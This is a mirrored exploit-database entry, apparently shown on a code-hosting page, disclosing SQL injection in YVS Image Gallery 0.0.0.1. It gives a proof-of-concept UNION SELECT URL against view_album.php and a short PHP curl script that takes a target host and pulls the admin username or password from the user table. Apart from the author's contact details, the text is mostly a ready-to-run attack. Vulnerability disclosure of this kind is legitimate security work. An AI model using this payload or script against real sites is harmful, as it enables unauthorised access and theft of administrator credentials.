PageRenderTime 35ms CodeModel.GetById 11ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/18526.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 91 lines | 88 code | 3 blank | 0 comment | 0 complexity | 18ca77872605dd07e2a944c2aff30d67 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. -=[+] Application: YVS Image Gallery

    2. 

  2. -=[+] Version: 0.0.0.1

    3. 

  3. -=[+] Vendor's URL: http://yvs.vacau.com/gallery.html

    4. 

  4. -=[+] Platform: Windows\Linux\Unix

    5. 

  5. -=[+] Bug type: Sql INJECTIONS

    6. 

  6. -=[+] Exploitation: Remote

    7. 

  7. -=[-]

    8. 

  8. -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~

    9. 

  9. -=[+] Facebook: https://www.facebook.com/CorryL

    10. 

  10. -=[+] Twitter: https://twitter.com/#!/CorradoLiotta

    11. 

  11. -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

    12. 

  12. -=[+] +Google: https://plus.google.com/u/0/109396477464303670923

    13. 

  13. 

    14. 

  14. ...::[ Descriprion ]::..

    15. 

  15. 

    16. 

  16. This is a small database driven gallery created to be implemented

    17. 

  17. within your existing site.

    18. 

  18. The coding is reasonably straight forward and can be easily moved into

    19. 

  19. your existing development

    20. 

  20. by anyone with basic understanding of PHP.

    21. 

  21. Only a first attempt at the system has a long way to go,

    22. 

  22. but it provides you with all the necessary tools to run your own

    23. 

  23. picture gallery,

    24. 

  24. such as uploading of multiple images and creation of thumbnails.

    25. 

  25. The gallery is distributed as free-ware but if you decide to use it in

    26. 

  26. any business or just decide that it's worth it,

    27. 

  27. any donations will be greatly appreciated. details will be made available soon.

    28. 

  28. 

    29. 

  29. 

    30. 

  30. ...::[ Bug ]::..

    31. 

  31. 

    32. 

  32. exploiting this bug a remote attaker is able' to go up again to user

    33. 

  33. name and admin password

    34. 

  34. 

    35. 

  35. 

    36. 

  36. 

    37. 

  37. ...::[ Proof Of Concept ]::..

    38. 

  38. 

    39. 

  39. http://Server-Victim/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user

    40. 

  40. 

    41. 

  41. ...::[ Exploit ]::..

    42. 

  42. 

    43. 

  43. #!/usr/bin/php -f

    44. 

  44. <?php

    45. 

  45. #

    46. 

  46. # view_album.php curl exploit

    47. 

  47. #

    48. 

  48. 

    49. 

  49. 

    50. 

  50. // Created by Corrado Liotta Aka CorryL

    51. 

  51. // For educational only

    52. 

  52. // use php exploit.php 127.0.0.1 username for admin username o

    53. 

  53. password for admin password

    54. 

  54. 

    55. 

  55. $target = $argv[1];

    56. 

  56. $info = $argv[2];

    57. 

  57. 

    58. 

  58. $ch = curl_init();

    59. 

  59. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);

    60. 

  60. curl_setopt($ch, CURLOPT_URL,

    61. 

  61. "http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user");

    62. 

  62. curl_setopt($ch, CURLOPT_HTTPGET, 1);

    63. 

  63. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE

    64. 

  64. 5.01; Windows NT 5.0)");

    65. 

  65. curl_setopt($ch, CURLOPT_TIMEOUT, 3);

    66. 

  66. curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);

    67. 

  67. curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);

    68. 

  68. curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");

    69. 

  69. $buf = curl_exec ($ch);

    70. 

  70. curl_close($ch);

    71. 

  71. unset($ch);

    72. 

  72. 

    73. 

  73. echo $buf;

    74. 

  74. ?>

    75. 

  75. 

    76. 

  76. ..::[ Disclousure Timeline ]::..

    77. 

  77. 

    78. 

  78. [23/02/2012] - No Vendor Information

    79. 

  79. 

    80. 

  80. -- 

    81. 

  81. Corrado Liotta    A.k.a (CorryL)

    82. 

  82. Email: corryl80@gmail.com

    83. 

  83. Slype: corrado_liotta

    84. 

  84. Facebook: http://www.facebook.com/home.php/CorryL

    85. 

  85. Twitter: https://twitter.com/#!/CorradoLiotta

    86. 

  86. Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

    87. 

  87. 

    88. 

  88. Specialist in:

    89. 

  89. Bug Hunting

    90. 

  90. Security Audits

    91. 

  91. Penetration Test
    92.